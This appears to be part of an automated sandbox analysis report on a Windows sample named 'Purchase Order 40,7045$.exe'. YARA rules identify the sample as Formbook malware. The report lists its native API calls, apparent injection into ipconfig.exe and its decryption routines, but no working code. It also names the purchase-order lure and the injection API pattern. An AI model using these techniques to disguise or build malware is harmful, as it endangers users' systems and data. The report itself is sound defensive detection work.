Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Executable has a suspicious name (potential lure to open the executable)

Source: Purchase Order 40,7045$.exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Purchase Order 40,7045$.exe

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00417BA0 NtCreateFile,	1_2_00417BA0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00417C50 NtReadFile,	1_2_00417C50
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00417CD0 NtClose,	1_2_00417CD0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00417D80 NtAllocateVirtualMemory,	1_2_00417D80
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00417C4C NtReadFile,	1_2_00417C4C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00417CCA NtClose,	1_2_00417CCA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC98F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_00FC98F0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_00FC9860
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9840 NtDelayExecution,LdrInitializeThunk,	1_2_00FC9840
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC99A0 NtCreateSection,LdrInitializeThunk,	1_2_00FC99A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_00FC9910
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9A50 NtCreateFile,LdrInitializeThunk,	1_2_00FC9A50
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9A20 NtResumeThread,LdrInitializeThunk,	1_2_00FC9A20
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_00FC9A00
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC95D0 NtClose,LdrInitializeThunk,	1_2_00FC95D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9540 NtReadFile,LdrInitializeThunk,	1_2_00FC9540
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC96E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_00FC96E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_00FC9660
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9FE0 NtCreateMutant,LdrInitializeThunk,	1_2_00FC9FE0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC97A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_00FC97A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9780 NtMapViewOfSection,LdrInitializeThunk,	1_2_00FC9780
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9710 NtQueryInformationToken,LdrInitializeThunk,	1_2_00FC9710
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC98A0 NtWriteVirtualMemory,	1_2_00FC98A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FCB040 NtSuspendThread,	1_2_00FCB040
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9820 NtEnumerateKey,	1_2_00FC9820
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC99D0 NtCreateProcessEx,	1_2_00FC99D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9950 NtQueueApcThread,	1_2_00FC9950
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9A80 NtOpenDirectoryObject,	1_2_00FC9A80
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9A10 NtQuerySection,	1_2_00FC9A10
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FCA3B0 NtGetContextThread,	1_2_00FCA3B0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9B00 NtSetValueKey,	1_2_00FC9B00
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC95F0 NtQueryInformationFile,	1_2_00FC95F0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9560 NtWriteFile,	1_2_00FC9560
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FCAD30 NtSetContextThread,	1_2_00FCAD30
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9520 NtWaitForSingleObject,	1_2_00FC9520
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC96D0 NtCreateKey,	1_2_00FC96D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9670 NtQueryInformationProcess,	1_2_00FC9670
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9650 NtQueryValueKey,	1_2_00FC9650
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9610 NtEnumerateValueKey,	1_2_00FC9610
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9770 NtSetInformationFile,	1_2_00FC9770
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FCA770 NtOpenThread,	1_2_00FCA770
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9760 NtOpenProcess,	1_2_00FC9760
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC9730 NtQueryVirtualMemory,	1_2_00FC9730
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FCA710 NtOpenProcessToken,	1_2_00FCA710
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9A50 NtCreateFile,LdrInitializeThunk,	5_2_02EB9A50
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9860 NtQuerySystemInformation,LdrInitializeThunk,	5_2_02EB9860
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9840 NtDelayExecution,LdrInitializeThunk,	5_2_02EB9840
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB99A0 NtCreateSection,LdrInitializeThunk,	5_2_02EB99A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_02EB9910
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB96E0 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_02EB96E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB96D0 NtCreateKey,LdrInitializeThunk,	5_2_02EB96D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9FE0 NtCreateMutant,LdrInitializeThunk,	5_2_02EB9FE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9780 NtMapViewOfSection,LdrInitializeThunk,	5_2_02EB9780
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9710 NtQueryInformationToken,LdrInitializeThunk,	5_2_02EB9710
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB95D0 NtClose,LdrInitializeThunk,	5_2_02EB95D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9540 NtReadFile,LdrInitializeThunk,	5_2_02EB9540
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9A80 NtOpenDirectoryObject,	5_2_02EB9A80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9A20 NtResumeThread,	5_2_02EB9A20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9A00 NtProtectVirtualMemory,	5_2_02EB9A00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9A10 NtQuerySection,	5_2_02EB9A10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EBA3B0 NtGetContextThread,	5_2_02EBA3B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9B00 NtSetValueKey,	5_2_02EB9B00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB98F0 NtReadVirtualMemory,	5_2_02EB98F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB98A0 NtWriteVirtualMemory,	5_2_02EB98A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EBB040 NtSuspendThread,	5_2_02EBB040
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9820 NtEnumerateKey,	5_2_02EB9820
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB99D0 NtCreateProcessEx,	5_2_02EB99D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9950 NtQueueApcThread,	5_2_02EB9950
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9660 NtAllocateVirtualMemory,	5_2_02EB9660
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9670 NtQueryInformationProcess,	5_2_02EB9670
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9650 NtQueryValueKey,	5_2_02EB9650
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9610 NtEnumerateValueKey,	5_2_02EB9610
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB97A0 NtUnmapViewOfSection,	5_2_02EB97A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9760 NtOpenProcess,	5_2_02EB9760
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EBA770 NtOpenThread,	5_2_02EBA770
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9770 NtSetInformationFile,	5_2_02EB9770
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9730 NtQueryVirtualMemory,	5_2_02EB9730
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EBA710 NtOpenProcessToken,	5_2_02EBA710
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB95F0 NtQueryInformationFile,	5_2_02EB95F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9560 NtWriteFile,	5_2_02EB9560
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB9520 NtWaitForSingleObject,	5_2_02EB9520
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EBAD30 NtSetContextThread,	5_2_02EBAD30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B17BA0 NtCreateFile,	5_2_02B17BA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B17CD0 NtClose,	5_2_02B17CD0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B17C50 NtReadFile,	5_2_02B17C50
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B17CCA NtClose,	5_2_02B17CCA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B17C4C NtReadFile,	5_2_02B17C4C

Detected potential crypto function

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E9969	0_2_013E9969
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E91F9	0_2_013E91F9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E8D64	0_2_013E8D64
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E9D51	0_2_013E9D51
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E9597	0_2_013E9597
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E07F6	0_2_013E07F6
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0041C16E	1_2_0041C16E
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00408A40	1_2_00408A40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00408A3B	1_2_00408A3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0041C52F	1_2_0041C52F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00402D8A	1_2_00402D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00402D90	1_2_00402D90
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0041BF03	1_2_0041BF03
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB20A0	1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9B090	1_2_00F9B090
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA830	1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041002	1_2_01041002
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0105E824	1_2_0105E824
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010520A8	1_2_010520A8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA4120	1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010528EC	1_2_010528EC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8F900	1_2_00F8F900
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01052B28	1_2_01052B28
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104DBD2	1_2_0104DBD2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010403DA	1_2_010403DA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0103FA2B	1_2_0103FA2B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBEBB0	1_2_00FBEBB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010522AE	1_2_010522AE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAAB40	1_2_00FAAB40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01052D07	1_2_01052D07
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01051D55	1_2_01051D55
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010525DD	1_2_010525DD
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9841F	1_2_00F9841F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9D5E0	1_2_00F9D5E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104D466	1_2_0104D466
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2581	1_2_00FB2581
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F80D20	1_2_00F80D20
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA6E30	1_2_00FA6E30
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0105DFCE	1_2_0105DFCE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01051FF1	1_2_01051FF1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104D616	1_2_0104D616
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01052EF7	1_2_01052EF7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F422AE	5_2_02F422AE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F2FA2B	5_2_02F2FA2B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3DBD2	5_2_02F3DBD2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F303DA	5_2_02F303DA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAEBB0	5_2_02EAEBB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9AB40	5_2_02E9AB40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F42B28	5_2_02F42B28
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F428EC	5_2_02F428EC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA20A0	5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F420A8	5_2_02F420A8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8B090	5_2_02E8B090
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F4E824	5_2_02F4E824
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F31002	5_2_02F31002
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E94120	5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7F900	5_2_02E7F900
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F42EF7	5_2_02F42EF7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E96E30	5_2_02E96E30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3D616	5_2_02F3D616
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F41FF1	5_2_02F41FF1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F4DFCE	5_2_02F4DFCE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3D466	5_2_02F3D466
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8841F	5_2_02E8841F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8D5E0	5_2_02E8D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F425DD	5_2_02F425DD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA2581	5_2_02EA2581
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F41D55	5_2_02F41D55
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E70D20	5_2_02E70D20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F42D07	5_2_02F42D07
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B08A3B	5_2_02B08A3B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B08A40	5_2_02B08A40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B1C16E	5_2_02B1C16E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B02FB0	5_2_02B02FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B1BF03	5_2_02B1BF03
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B02D90	5_2_02B02D90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B02D8A	5_2_02B02D8A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02B1C52F	5_2_02B1C52F

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: String function: 013E0550 appears 47 times
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: String function: 013EDBFD appears 32 times
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: String function: 013DB9F5 appears 624 times
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: String function: 00F8B150 appears 54 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 02E7B150 appears 48 times

Sample file is different than original file name gathered from version info

Source: Purchase Order 40,7045$.exe, 00000000.00000003.237695476.000000000332F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe
Source: Purchase Order 40,7045$.exe, 00000001.00000002.273903845.0000000000F27000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameipconfig.exej% vs Purchase Order 40,7045$.exe
Source: Purchase Order 40,7045$.exe, 00000001.00000002.274263371.000000000120F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe

Yara signature match

Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
